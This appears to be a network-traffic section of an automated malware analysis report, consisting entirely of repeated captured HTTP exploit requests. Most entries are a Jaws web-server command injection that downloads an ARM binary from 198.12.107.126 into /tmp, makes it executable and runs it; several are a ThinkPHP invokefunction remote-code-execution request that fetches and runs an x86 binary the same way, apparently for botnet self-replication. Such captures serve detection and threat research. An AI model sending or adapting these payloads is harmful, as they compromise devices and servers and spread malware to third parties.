      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
